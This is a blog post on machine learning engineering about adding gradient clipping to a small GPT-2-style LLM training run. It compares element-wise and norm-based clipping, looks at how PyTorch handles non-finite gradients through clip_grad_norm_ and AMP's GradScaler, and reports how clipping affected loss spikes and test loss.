So if sometimes we'll get crazy gradients, what can we do about them? We clip them. Clipping gradients simply means that if they get larger than a particular number -- v , which we define -- we reduce them to that number. In other words, we have a cap on how big they can get. "Deep Learning" ("DL" from now on) suggests two ways to do it. Remember that while in the example above we only had one parameter -- on the X axis -- for the GPT-2 small LLM we're training, we have 163 million of them. So the gradients, instead of being one number, will be a 163M-long vector, one per parameter. The two ways to clip are: clip each element of the gradient vector independently so that none is larger in magnitude than v , or, if the norm of the whole gradient vector exceeds v , rescale the vector so that its norm is exactly v .

The second feels more elegant -- we're scaling all of the elements of the gradient vector by the same amount, so it still points in the same direction. Interestingly, though, DL says that the two methods "work similarly", which I'll read as "are pretty much the same in practice". DL then goes on to say how infinite or not-a-number gradients should be handled. With the first way, clearly doing it naively would set every element in the gradient vector to v , which would make the total size (norm) of the update very large. With the second, it would be even worse -- we'd still wind up with completely junk gradients, because the norm would be infinite, and inf / inf in Python is nan , so we'd be applying gradients with NaNs in them at best.
That would be likely to knock our model into unrecoverable territory, as any parameter that had that applied to it would be NaN forever. Their suggested solution is that if you get garbage gradients like that, you can take a random step -- that is, create a new gradient to apply that has the norm v but just points in a random direction. The idea is that this will move you away from the cliff-ridden part of the loss landscape where you've found yourself (more about that later), and things will continue nicely.

So, anyway, how to do this in practice? PyTorch has a function, clip_grad_norm_ , and that's what's referenced in almost every bit of writing I've found about how to clip gradients. So I decided to use that, assuming it would do what was described in DL's second option and that it would do the random updates they suggest for non-finite gradients. (I was half-correct -- see later.) As to how to use it: if we had a normal training loop, where we were just using a normal optimiser, we'd simply add a call to clip the gradients between the backward pass and the optimiser step, passing in the max value v from above.

However, for our training code using Automatic Mixed Precision (AMP), it's a little more complicated -- but luckily, the AMP explainer we've been using has a section explaining what to do : we need to unscale the gradients before clipping them. That looks a bit weird; we're "unscaling" the gradients, then clipping them, then using the scaler to step the optimiser. You'd think that you'd need to "re-scale" the scaler after clipping the gradients -- to get back to where you started from before the optimiser step. From the help page I gather it keeps track of whether or not the gradients it has right now are currently scaled, and handles them appropriately based on that state in the step.

Anyway, given that we know what the code looks like now, we need to implement it in a way that can be easily switched on for this experiment (and potentially in the future), but which also allows us to not use it if we don't want to.
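Before moving on to the training-loop plumbing, the two clipping strategies (and DL's random-step fallback for non-finite gradients) can be sketched in plain Python. The helper names here are invented for illustration; this is not the actual PyTorch implementation, though the norm-based version is what PyTorch's clip function does.

```python
import math
import random

def clip_elementwise(grads, v):
    # Strategy 1: cap each element independently at magnitude v.
    # Note this can change the direction of the gradient vector.
    return [max(-v, min(v, g)) for g in grads]

def clip_by_norm(grads, v):
    # Strategy 2: if the vector's norm exceeds v, rescale the whole
    # vector so its norm is exactly v -- direction is preserved.
    norm = math.sqrt(sum(g * g for g in grads))
    if not math.isfinite(norm):
        # DL's suggestion for inf/NaN gradients: take a step of
        # norm v in a random direction, to move away from the
        # cliff-ridden part of the loss landscape.
        rand = [random.gauss(0, 1) for _ in grads]
        scale = v / math.sqrt(sum(r * r for r in rand))
        return [r * scale for r in rand]
    if norm > v:
        return [g * (v / norm) for g in grads]
    return grads

g = [3.0, 4.0]                     # norm 5
print(clip_elementwise(g, 1.0))    # [1.0, 1.0] -- direction changed
print(clip_by_norm(g, 1.0))        # ~[0.6, 0.8] -- same direction, norm 1
```

The elementwise version turns the (3, 4) gradient into (1, 1), pointing somewhere new; the norm version shrinks it to roughly (0.6, 0.8), the same direction scaled down.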
The best way with our setup is to make it a training option, and we can just pass in a "don't clip" value for it in the function that we use to find the maximum micro-batch size for our current hardware, as all we're testing for there is memory usage -- we don't care if we're doing good updates. Here's the code delta for that , plus a bugfix to allow for files without the new option in them.

But it would also be useful to be able to track when it "fired" -- that is, when we had to clip our gradients. Now, the docs say that the function returns the "[t]otal norm of the parameter gradients (viewed as a single vector)". It doesn't say whether that's before or after the clipping, but given that the return value would always be capped at the limit if it was after, I'm going to guess that it returns the pre-clipping norm (ChatGPT agrees). So we can chart that; changes in these diffs: 1 , 2 , 3 , 4 .

So we now have code to clip gradients to a given norm size and to chart the gradient norms, so that we know what they were before clipping. The question is, what should that clipping norm be? Some googling around suggested that there was no standard way of saying "for such-and-such a kind of model, gradients should be clipped at around x ". For example, one commenter on this Reddit thread says "Common values are 1, 3, 5, 8, 10", and likewise the sample code in this tutorial has 1, as does this one . So my initial thought was, let's just use 1. But then I wondered, what actually are the gradient norms that we're getting in normal training? I decided to run a local short train on 3m tokens (a thousandth of the full training set, taking just less than four minutes) with very frequent checkpointing and gradient clipping set to 1, and see what happened. You can see that the "grad max" line is almost always above the "grad clip" -- we're almost always clipping. This doesn't sound right.
It looked like the range of the grad max was generally between 1.1 and a little above 3, so I set the clipping threshold to 3.5 and did another train. Our loss is about the same, but we're no longer clipping -- and that's what we want; there was no evidence of exploding gradients for that short run -- just big updates near the start, as you'd expect. I then ran the same with no gradient clipping at all, and got exactly the same shape for the loss chart as I did with gradient clipping at 3.5, and the same final loss -- that's a good signal that clipping is not affecting the train when we stay inside the limit, which is exactly what we want.

So, it was time to train our model! I kicked off the train, and after a little while, I looked at the training chart, which is updated dynamically as the model trains. You can see the dotted green lines, both the light one and the dark one -- that is, the "grad max" and the "grad avg" -- disappear starting just before global step 4,000, only coming back at about 5,500 -- that is, these were not plotted for global steps 4,319 and 4,936, even though the loss was. What was going on?

I took a look at the checkpoint meta file for the first of those to see what the actual numbers were, and saw that both of those values were infinite. Aha! The pyplot code I was using could not handle infinite values, which is entirely reasonable. That was easy enough to fix, though -- I just replaced positive infinity by 1,000,000 and negative infinity by -1,000,000, and then (in the interest of getting a proper from-scratch run) kicked everything off from the beginning.

The resulting training chart is a little hard to read, but if you look closely at the green lines, you can see that there are seven periods where gradients were either very large or infinite. Weirdly, though, out of the seven, two of them were two checkpoint periods long (that is, two periods of 617 global steps).
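That infinity workaround is trivial but worth spelling out; a minimal sketch (the function name is mine, not the post's):

```python
import math

# Cap chosen in the post: large enough to be obviously off-scale on
# the chart, but still a finite number that pyplot can handle.
INF_CAP = 1_000_000

def plottable(values):
    """Replace +/- infinity with large finite sentinels for charting."""
    return [
        INF_CAP if v == math.inf else -INF_CAP if v == -math.inf else v
        for v in values
    ]

print(plottable([2.3, math.inf, -math.inf, 0.9]))
# [2.3, 1000000, -1000000, 0.9]
```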
That felt weird, though of course we're looking at the maximum gradient norm and the average gradient norm -- so two single infinite/high-gradient steps in successive 617-step periods would lead to that effect. What was even stranger, though, was that if you look at the training chart for the run with no gradient clipping, we have only three loss spikes rather than seven -- though it's also very noticeable that the gradient-clipped run had only two small loss spikes, unlike the three larger ones in the unclipped run. The training loss the gradient-clipped run reported at the end was better, too, versus 3.743 at the end of the baseline train.

So it was time to download the model and run the sequence-completion smoke test. Coherent enough! Next, we evaluate it against our held-back test set. The loss had gone down -- but only from 3.743 to 3.678, a reduction of 0.065, or about 1.7%. That's not actually all that bad! After all, in my initial experiments on my local machine, training for a Chinchilla-optimal number of tokens from FineWeb-Edu (rather than the regular FineWeb I'm using now) got a loss of 4.167 on the same dataset (weirdly worse with the more-curated training set), and training for a further Chinchilla-optimal number of tokens only brought that down to 4.135, for a difference of 0.032, or 0.7%. It's not strictly comparable due to the different training sets, but speaking very loosely, we could say that gradient clipping for this train had more effect than doubling the training time for the other one. That's pretty nifty.

But the question remained: why those long periods of high gradients, even with gradient clipping? And why were there still loss spikes -- in particular the one just before global step 12,000, which lasted for two checkpoint periods? Remember that when I started the first run of this train, and got the chart with the missing bits, it was because the logged grad max and grad avg were infinite.
What happens when clip_grad_norm_ gets an infinite gradient -- either one that has an infinity as one of its components, or one that (due to numerical overflow) winds up with a norm of infinity anyway? I'd been kind of assuming that it did what the authors described in "Deep Learning" -- a random update of norm v -- given that the book stated pretty confidently that you "can" do it but then appeared to consider the topic closed. But it doesn't! If you check that link to the docs, you'll see that it has a parameter, error_if_nonfinite, which is False by default. If it's set to True, it will raise an exception if the norm is positive or negative infinity, or if it's not a number -- which catches both the infinite-component and the norm-overflow cases above. But if it's not set -- and we weren't setting it -- and the norm or the gradients are non-finite, then clip_grad_norm_ will essentially produce garbage gradients. Depending on the exact cause, elements will either be infinities of one sign or another, or NaNs. And if these are added to parameters, then those parameters will become garbage too.

Now that leads to the question: given that we know that somewhere in the period between the checkpoint at global step 4,319 and the previous one at 3,702 there was an infinite norm at some point, how on earth did the model manage to continue training after that? Loss went up at around the same time, but it wasn't completely broken, as it would have been with NaNs or infinities in its parameters.

Obscurely enough, the answer turned out to be in the AMP explainer, in a comment in one of the bits of example code regarding the GradScaler class we're using: its step() skips the underlying optimiser step entirely if it finds infs or NaNs in the gradients.

So what was happening was that the scaler -- something we introduced into our code to get a speedup by using 16-bit floats instead of 32-bit whenever PyTorch thought it would make sense -- was protecting us against infinite and NaN gradients as a side-effect. It was skipping updates that would have polluted our weights with bad values from non-finite gradients.
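That skip behaviour can be sketched in a few lines of pure Python (this mimics the effect of GradScaler.step, not PyTorch's actual implementation): check every gradient for non-finite values, and apply the update only when all of them are clean:

```python
import math

def safe_step(params, grads, lr):
    """Apply a gradient-descent step, but skip it entirely if any
    gradient element is inf or NaN -- the way GradScaler.step does."""
    if not all(math.isfinite(g) for g in grads):
        return False  # step skipped; parameters untouched
    for i in range(len(params)):
        params[i] -= lr * grads[i]
    return True

params = [1.0, 2.0]
print(safe_step(params, [0.5, -0.5], lr=0.5), params)      # True [0.75, 2.25]
print(safe_step(params, [math.inf, 0.0], lr=0.5), params)  # False [0.75, 2.25]
```

The key property is the second line of output: after a non-finite gradient, the parameters are exactly as they were, so training can simply carry on with the next batch.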
If the above comes across as a little frustrated, then it's because I am a bit! From a software engineering viewpoint, this situation really does feel like a rather messy part of the API. There are three things that it's reasonable for a library to do with infinite/NaN gradients: blindly apply them and expect the developer to sanitise their inputs; raise an error; or take some kind of default sane action, like skipping the update.

Now, if we look at that error_if_nonfinite parameter, we can see that the first two of those cases are handled there, and the developer can choose which option to follow. It's not where I'd personally put it (the step() function on the optimiser seems more natural) and I think I'd probably set the default to True too, but I can also imagine good reasons for it being the way it is -- backward compatibility, for one. But the "skip non-finite gradients" being a (not even optional!) behaviour that is on a class designed for handling mixed-precision training just seems outright bonkers. I would be surprised if there weren't people out there who've spent days trying to work out why their training runs failed catastrophically when they decided to switch from mixed-precision to "full fat" 32-bit floats, not realising that a hardly-even-documented feature of the scaler 3 had been saving them from gradient issues previously.

Anyway, rant over. What does this all mean? There are three ways a gradient can explode: it can get very large, still be finite, and have a finite norm; it can get very large, still be finite, but have an infinite norm (eg. due to numerical overflow); or it can become infinite -- that is, at least one of the parameters' gradients is infinite (which of course means an infinite norm regardless of any numerical stuff).

With both the baseline code and our new code, the GradScaler was saving us from the last two of those, by skipping the optimiser steps with non-finite gradients. However, the baseline run was not protected against the first kind -- large but finite gradients with a finite norm -- while this run was protected.

What I'm almost certain is happening here is that in all of my training runs so far, there have been all three kinds of issues with exploding gradients. The GradScaler, which, again, we introduced for faster training, happened to be saving us from the infinite gradients/norms. But we were still being bitten by the finite but excessively large ones.
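The second of those cases -- every element finite, but the norm overflowing to infinity -- is easy to demonstrate even in plain Python (float64 here; with 16-bit floats it happens at far smaller magnitudes, since fp16 overflows above 65,504):

```python
import math

def l2_norm(values):
    """Naive L2 norm: sum of squares, then square root."""
    return math.sqrt(sum(v * v for v in values))

grads = [1e200, 1e200]   # both elements are perfectly finite...
assert all(math.isfinite(g) for g in grads)
print(l2_norm(grads))    # ...but squaring them overflows to inf
```

With a norm of infinity, the "divide by the norm, multiply by v" clipping step turns every gradient element into zero-divided nonsense -- which is exactly the garbage-gradient case described above.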
And that, I think, is why this training run had a positive -- not huge, but certainly worthwhile -- effect on the test set loss. If I had more time, I think I'd do another run, logging all three of those categories of error to see how frequent they are, and charting the result. That might go some way to explaining the final question I had here: why is it that the renowned "Deep Learning" suggests a random update to get away from the cliff where you've found yourself, while we seem to be getting away with just skipping the update, which is much simpler? Well, the book was written in 2016, and I guess rather a lot has changed in the last 10 years :-) My guess is that their solution might have been a solid default in the age of RNNs, but might not make so much sense with the kind of models we're training these days. I think I can see a way in which that makes sense. Think of the illustration of a loss "cliff" in a one-parameter world that we had at the start of this post: If you happen to wind up on that cliff, you're in trouble. But imagine a two-parameter model -- the line of the loss function becomes a surface. Just as in the real world you might be able to walk along the edge at the top of a cliff and find a nice easy slope down next to it, you can imagine that the cliff in the two-parameter case might be less of a problem because you don't need to be lucky enough to jump down it -- you can walk around it. Extrapolating examples like this to higher dimensions is risky, but I think it should hold that the more dimensions you're working with, the less likely it is that a cliff is an issue -- you're more likely to be able to find a way around it. I've heard a very similar argument made for why local minima are less of an issue with lots of parameters. It's certainly worth saying that this is far from a mathematical proof, but I think it's a decent grounding for intuition. Now think about an RNN. 
Although you're doing back-propagation through time over what amounts to a very deep network, there aren't actually all that many parameters, certainly compared to an LLM like this. Each parameter is involved in the back-propagation multiple times. So, thinking of it that way, the gradient vector for the RNNs they were dealing with was of much lower dimensionality than the ones we're dealing with, even for this tiny model. They say that the random step "will typically move away from the numerically unstable configuration". I'm probably playing fast and loose here, but I'll take that as something like: if you wound up on a cliff, you were likely in a very "cliffy" area of the loss landscape. "Teleporting" randomly to somewhere some distance away was a sensible way to handle that. In our situation, even if the area is "cliffy" in the direction that one particular batch might push us, we have so many extra dimensions that it may well be that it won't be so bad with the next one. So just skipping the problematic update -- under all of those assumptions -- seems a perfectly reasonable way to handle it. All of this, BTW, made me think back to validation loss. In our previous training runs, where we were measuring it just before each checkpoint, its spikes were in general correlated with but not identical to spikes in training loss: Now, of course, exploding gradients don't have to be related to high training loss -- there's enough non-linearity in there that we can treat them as being completely uncorrelated, I think. But you definitely would expect them to have an effect on validation loss if applied. Disregarding the infinite ones (which were being filtered out anyway), the very high ones that we are now clipping would, in the unclipped baseline train, seem very likely to have caused validation loss spikes. So: if I hadn't stripped that out, we would likely have been able to see a clear difference in the validation loss line between clipped and unclipped. 
That would have been useful! I'm not going to re-introduce it, though; best to keep the number of code changes to a minimum if I'm trying to compare like with like over the course of these intervention tests.

I think that's enough for gradient clipping. I may come back and do the experiment another time to see what the relative ratios of the different kinds of problematic gradients are. Are there parts of the train where we get lots of them as a percentage (ie. we're somewhere "cliffy" in the loss landscape)? How many infinite-gradient vs infinite-norm vs big-but-not-infinite instances do we have relative to each other, and to normal gradient updates? What do we see if we chart validation loss? And so on. But for now: gradient clipping definitely helps, and goes on the positive interventions list!

I'm thinking I'll see what happens with switching off dropout next. That should at least be a bit easier... Stay tuned!

The three candidate explanations for the loss spikes, from the start of the post:

- A "bad batch" -- that is, one batch, or even one sequence in a batch, was massively different in structure to the others that the model had seen, so it just had much worse loss. That doesn't seem likely in this case, though: the numbers on the chart are averages over 617 global steps each, and it would take a truly pathological sequence to move the needle that much.
- Something weird in the optimiser. That's not something I understand well, but according to the various LLMs I'm working with, it's a possibility.
- Exploding gradients. This is my working hypothesis, and so in this post I'll try out gradient clipping, the normal solution to that problem.

And the two ways of clipping gradients:

- We clip element-wise. If any one of the gradients in the vector is larger than v, we reduce it to v.
- We clip based on the norm: the length of the gradient vector in -- in our case -- 163M-dimensional space. That sounds harder than it is -- it's really just an extension of the Pythagorean equation a² + b² = c² to multiple dimensions. If you want to work out the length of a vector (a, b), then you can use Pythagoras to work out c = √(a² + b²), and that generalises to any number of dimensions. So for our model we'd just square all 163M elements of the vector, sum those, and take the square root of the result, and that's the norm. 2 If the norm is greater than v, we just divide every element of the gradient vector by the norm and multiply the result by v, to produce a new gradient vector whose norm is v.

Reference: I. Goodfellow, Y. Bengio, and A. Courville, Deep Learning (2016), MIT Press.

1. Oh my.  ↩

2. Technically the L2 norm -- if you used cubes/cube root it would be L3, and likewise for the power of four and L4, and so on. But the L2 is the one used for gradient clipping.  ↩

3. Shades of Douglas Adams, really: "But the plans were on display..." "On display? I eventually had to go down to the cellar to find them." "That's the display department." "With a flashlight." "Ah, well, the lights had probably gone." "So had the stairs." "But look, you found the notice, didn't you?" "Yes," said Arthur, "yes I did. It was on display in the bottom of a locked filing cabinet stuck in a disused lavatory with a sign on the door saying 'Beware of the Leopard.'"  ↩
